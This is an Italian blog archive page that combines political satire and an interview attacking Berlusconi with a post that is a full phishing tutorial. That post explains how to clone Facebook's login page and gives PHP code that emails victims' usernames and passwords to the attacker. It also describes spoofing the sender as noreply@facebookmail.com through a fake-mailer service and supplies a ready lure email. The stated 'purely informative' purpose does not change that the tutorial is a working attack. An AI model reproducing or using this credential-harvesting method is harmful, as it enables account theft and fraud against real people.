Archivi categoria: Eventi e manifestazioni

Berlusca loda Alfano, noi lodiamo la Giustizia

In Italia, sotto ovvia proposta del cavaliere psico-nano esiste il lodo Alfano.

Il lodo Alfano garantisce l’immunità alle quattro alte cariche dello stato, finchè restano al loro posto (o cambiano poltrona). Qualsiasi delitto dovessero commettere, non sarebbero perseguibili fino alla fine della legislatura. Sono compresi anche i delitti comuni e quelli svincolati dall’attività politica, oltre a quelli per cui c’è un processo in corso già da prima del loro mandato.

In poche parole non si potrebbe procedere nemmeno nel caso strangolassero la moglie, molestassero la segretaria o, più verosimilmente, corrompessero un testimone perché possa mentire sotto giuramento in tribunale facendo assolvere un colpevole.

E’ chiaro che il lodo Alfano è una legge Ad Personam, sfido chiunque a trovare i motivi per cui non dovrebbe esserlo.

Non so se qualcuno conosce il brano “Geordie” di Fabrizio De Andrè, ma vi propongo una immagine che la modifica …

e anche un testo nuovo:

Impiccheranno Geordie con una corda d’oro,
Io invece ho il Lodo Alfano…
…che mi protegge se ammazzo anche te,
Sono uno Psyco Nano!!!

(Ringrazio per la frase il Signor D.Poggioni di Facebook)

L’ennesima assurdità dello psiconano Berlusconi

Luigi De Magistris è il deputato eletto con il maggior numero di preferenze al Parlamento europeo con circa mezzo milione di voti. Più di qualunque rappresentante di ogni altro Stato europeo. E’ un uomo che viene dalla Rete. Ha tutti i titoli per parlare di Europa, più di chiunque altro, si chiami Frattini o Gasparri.
Lo psiconano sta attuando una vecchia strategia dei dittatori. Per giustificare i suoi fallimenti trova sempre nuovi nemici esterni. Dopo i comunisti, gli extracomunitari, l’informazione mondiale e la Chiesa, oggi è il turno dell’Unione Europea che vorrebbe paralizzare se non si mette il bavaglio.

Intervista a Luigi de Magistris:

blog: Luigi de Magistris: Berlusconi dopo aver attaccato la stampa attacca anche l’Unione Europea con proclami pazzeschi.
L.d.M.: Ultimamente siamo al delirio del Presidente del Consiglio. Non sa più con chi prendersela, dopo essersela presa coi giudici, coi magistrati, con la libera stampa, adesso il fallimento del governo viene oscurato con attacchi all’Unione Europea. C’è stata una escalation che è cominciata con l’immigrazione, cioè il fallimento totale della legge Bossi-Fini, le immigrazioni sono aumentate, sono stati calpestati i diritti umani con le ultime tragedie che sono avvenute nei mari antistanti le coste italiane. Per non evidenziare il fallimento di questo governo, il Presidente del Consiglio se l’è presa con l’Unione Europea. La stessa cosa ha fatto con le carceri. Di fronte al dramma della sicurezza nel nostro Paese, la privatizzazione della sicurezza attraverso le ronde e attacchi ai magistrati, ha pensato bene di riversare la responsabilità della giustizia e del sovraffollamento delle carceri sull’Unione Europea.
E da ultimo l’attacco forsennato all’Unione Europea in generale, alla Commissione, aiportavoce dell’Unione Europea. Questo perché? Perché in Europa è ormai evidente a tutti il fallimento – anche al centro-destra europeo, il Partito Popolare europeo – di Berlusconi. Siccome l’immagine del Presidente del Consiglio è assolutamente deteriorata all’estero, dopo le vicende “papi” per capirci, attraverso la privatizzazione della cosa pubblica e l’utilizzo, quale utilizzatore finale, del corpo femminile, questa immagine del Presidente del Consiglio completamente lesionata, egli non fa altro che prendersela con la Commissione Europea per mascherare anche il fallimento della politica economica e del lavoro del governo. Questo è molto grave. È molto grave, perché invece nel Parlamento Europeo si stanno affrontando cose molto serie a cominciare proprio dai gravi temi dei cambiamenti climatici e dell’immigrazione. Berlusconi farebbe bene a dimettersi.
blog: Qual è la portata della gravità della minaccia che ha fatto Berlusconi? Io paralizzo la Commissione Europea? Magari i media italiani non riescono a rappresentarla adeguatamente, ma in Europa c’è scandalo per questo.
L.d.M.: Sì, questo è un passaggio di una gravità inaudita. Non si è mai visto che un Paese democratico minacci di paralizzare una istituzione semplicemente perché magari questa istituzione dice delle cose sgradite al Presidente del Consiglio, che si sta comportando come un piccolo peronista in Italia, come un dittatore che vuole consolidare il disegno piduista annientando l’indipendenza della magistratura, massacrando la libertà dell’informazione, facendo un assetto verticistico del potere, riducendo il Parlamento a mero organo di ratifica dei voleri del premier, privatizzando la sicurezza attraverso le ronde, riempiendo il Paese di militari per governare il conflitto sociale che verrà fuori, perché c’è il fallimento totale della politica economica e del lavoro di questo governo.

Guardate questo video e sopratutto ascoltatelo attentamente

(Va bè che sono cose che già si sanno, niente di nuovo 🙂 )
Estratto dal mitico Beppe Grillo Blog

Truffare con il Fake Login

Vi è mai capitato di ricevere email  strane e/o sospette di ebay, paypal o altri servizi importanti di e-commerce e pagamenti online ?

Guardate questa email:

Sembra autentica, vero ?

E’ chiaro che è una truffa!

Anche perchè io non sono neanche registrato ad ebay!

Una tecnica diffusissima a cui dovete stare molto attenti è questa:

Si inviano delle fake email ( Che hanno come mittente l’email vera, autentica e ufficiale del servizio per cui ci si vuole spacciare ),

queste fake mail contengono uno “scusante” che ti fanno raggiungere un’indirizzo web dove è riprodotto il sito(Ad esempio Ebay)

esattamente cosi’ com’è e dove c’è un form per loggarsi e l’utente che ci casca inserire i veri username e password, che in realtà vengono

inviati ai truffatori:)

Come fanno i truffatori”?

Per un giorno diventiamo truffatori 🙂

Queste informazioni sono solo per farvi capire e quindi per puro scopo informativo 🙂

Tutto ciò che ci serve è :

– Uno spazio web disponibile

– Un qualsiasi editor html( Meglio se Golive o Dreamweaver)

– Un sito o un programma contenente un servizio di fake mailer.

(Nel nostro caso useremo il mio:

http://www.matteoiammarrone.com/public/modules.php?name=fakemail

)

Fase 1 –  Scegliamo un servizio famoso “Vittima”.

Nel nostro caso scegliamo il famosissimo social network: Facebook

Adesso lo scopo dovrà essere quello di creare una pagina web identica alla pagina web di login di facebook 🙂

Per me che possiedo Adobe Golive è molto semplice, perchè in Adobe Golive è presente una funzione che mi consente di “Scaricare i siti”,

in questo modo: File -> Server -> Download Page, dopodichè inserisco l’indirizzo: http://www.facebook .com e clicco su “Download”.

Adesso modifichiamo l’act del form login di facebook sostituendo nel codice della pagina che abbiamo scaricato:

sostituendo

<form method=”post” action=”http://login.facebook.com/login.php?attempt=0″ name=”menubar_login” id=”menubar_login”>

con

<form method=”post” action=”index.php” name=”menubar_login” id=”menubar_login”>

Ora sviluppiamoci un codice php che ci invii tramite email il contenuto del campo username e password.

Nel caso di facebook, questo codice può andar bene:

<?php

if (isset($_POST[‘pass’])){

$username=$_POST[‘email’];

$password=$_POST[‘pass’];

$mail = “miaemail@sadsa.it”; //INSERITE QUI LA VOSTRA EMAIL”

mail($mail, “Nuova vittima!”, “EmailVittima: $username PAssword Vittima: $pass”);

echo “<meta http-equiv=’refresh’ content=’0, url=http://www.facebook.com’/>”;

}
?>

Inserite il codice sovrastante in un punto qualsiasi della pagina che avete scaricato e risalvate la pagina con estensione php.

Adesso  passiamo alla fase 2.

Fase 2 – Connettiamoci via ftp ad un nostro spazio web ( IL massimo sarebbe se è uno spazio web che ha un nome simile a facebook, ad esempio facebook.altervista.org, oppure facebook.net..ecc), una volta connessi all’ftp pubblichiamo il sito “clone” di facebook.

Nel nostro caso lo spazio web sarà: www.matteoiammarrone.com/fbtruffa

Fase 3 – Costruiamo l’email.

Nel nostro caso dobbiamo prendere come modello le vere email inviate dal vero facebook.

Siamo fortunati, visto che le email di facebook sono semplici testi e sostanzialmente non usano html, loghi o simboli particolari.

La nostra email avrà questo “testo piatto”:

Sei uno dei 100.000 utenti selezionati in tutta facebook per tentare di vincere il premio: Utente dell'anno!
Per confermare la tua identità effettua il login a facebook dal link sottostante:
http://www.matteoiammarrone.com/fbtruffa
Grazie,
il team di facebook.
------------
Vuoi specificare quali e-mail ricevere da Facebook? Accedi a:
http://www.facebook.com/editaccount.php?notifications&md=ZXZlbnRfdXBkYXRlO2Zyb209MTU3MDk4MDU1Njt0bz0xNjAyMjc5OTk2">http://www.facebook.com/editaccount.php?notifications&md=ZXZlbnRfdXBkYXRlO2Zyb209MTU3MDk4MDU1Njt0bz0xNjAyMjc5OTk2
Adesso inviamo il messaggio sovrastante usando questo fake email:
http://www.matteoiammarrone.com/public/modules.php?name=fakemail
Come email vittima inserita l'email di una persona di cui sapete della sua presenza su facebook, come email mittente inserite: noreply@facebookmail.com
:):)
Dopodichè inviate l'email e il giochino e' fatto!
 :)